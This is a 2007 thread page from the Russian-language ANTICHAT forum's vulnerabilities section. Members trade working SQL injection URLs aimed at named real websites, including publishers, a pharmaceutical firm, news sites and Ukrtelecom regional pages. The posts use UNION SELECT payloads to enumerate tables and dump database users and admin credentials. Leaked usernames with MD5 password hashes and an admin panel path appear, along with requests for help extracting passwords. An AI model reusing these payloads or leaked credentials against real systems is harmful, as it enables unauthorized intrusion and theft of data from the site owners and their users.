HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2311  
Старый 28.05.2007, 11:32
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Код:
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

Последний раз редактировалось _Pantera_; 28.05.2007 в 11:44..
 
Ответить с цитированием

  #2312  
Старый 28.05.2007, 13:23
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Pharmacheutical company
Цитата:
http://www.medochemie.com/products.php?by=category&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5/*
 
Ответить с цитированием

  #2313  
Старый 28.05.2007, 14:00
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Поля подобрал
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null/*
помогите вывести user u password
 
Ответить с цитированием

  #2314  
Старый 28.05.2007, 14:07
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

.edu кончились...
Код:
http://www.acconcept.ru/news/news.php?id=-124+union+select+1,version(),3,4,5,6,7,8/*
http://romanykultury.info/news/news.php?row=-333+union+select+1,version(),3,4,5/*
http://www.hrd.ru/news.php?act=news_by_id&news_id=-283+union+select+1,2,3,4,version(),6,7/*
http://www.cews.org/cews/news.php?aid=-384+union+select+1,version()/* наводим курсор на кнопочку "1" в правом верхнем углу
 
Ответить с цитированием

  #2315  
Старый 28.05.2007, 14:19
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от -=megahertz=-  
Поля подобрал
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null/*
помогите вывести user u password
круто ты их подобрал... научи как это делается?

а если серьезно, с полями ковыряться не охота, но там таблицы с префиксом ee_, например есть таблица ee_users... да и еще следи за кодировкой...
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2316  
Старый 28.05.2007, 14:36
Cond
Новичок
Регистрация: 28.05.2007
Сообщений: 13
Провел на форуме:
17665

Репутация: 23
По умолчанию

Код:
http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18/*
С таблицой проблема может есть скрипт который бы брутил таблицы например вводишь http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18 а скрипт дописывал бы +from+здесь_имена_таблиц/* и подбирал из текстового файла каждую строчку (таблицу) и выводил потом те таблицы в которых нет слова Warning или по другому отсеивание делать, например есть цифра от 1 до 50.
Программа SQL Injection TooL не помогла например ввожу туда http://moneyru.com/kat/show.php?tema=1
пробовал и http://moneyru.com/kat/show.php?tema=-1
ввёл сам кол-во полей (18) и выводимые написал что 11. Потом нажимаю брут таблиц она вывела все таблицы что есть в текстовом файле (.
Может есть нормальный рабочий скрипт чтобы только таблицы перебирал?
 
Ответить с цитированием

  #2317  
Старый 28.05.2007, 14:44
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.belt-wrestling.org/ru/fed.php?id=-9999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
=///
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2318  
Старый 28.05.2007, 14:49
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
160 таблиц:

Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables+limit+160,1/*
----------------------------

phpads_config:

Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(admin,char(58),admin_pw,char(58),admin_fullname,char(58),admin_email,char(58),admin_email_headers,char(58),admin_novice),7,8,9+from+phpads_config/*
phpads - система управления банерами.

root:d8f67c1080703334f221abe74fd4a0f1

А вот самой админки не нашел.

----------------------------

mw_members:

Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(name,char(58),password,char(58),description),7,8,9+from+mw_members+limit+0,1/*
maglord:a5253ca029930561dce315f35e1741fb
 
Ответить с цитированием

  #2319  
Старый 28.05.2007, 14:53
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grey  
А вот самой админки не нашел.
http://www.magweb.ru/adm/


2Cond...

ты на SQL Injection TooL не гони... если сам не можешь пользовать прогу, а остольные могут, то виноват в этом только ты...

в поле URL введи:
http://moneyru.com/kat/show.php?tema=4

в поле string введи:
Код:
<b>Каталог - Ресурсы Webmoney</b>
и все у тебя найдется и не надо самому там ниче выставлять
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 28.05.2007 в 15:22..
 
Ответить с цитированием

  #2320  
Старый 28.05.2007, 15:25
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

cherkasy.ukrtelecom.ua
Код:
http://www.cherkasy.ukrtelecom.ua/ua/hot_news/?id=-1188+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
таблицы почемуто не выводятся=\
Код:
http://www.lviv.ukrtelecom.ua/ua/hot_news/?id=-2025+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
анологично!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ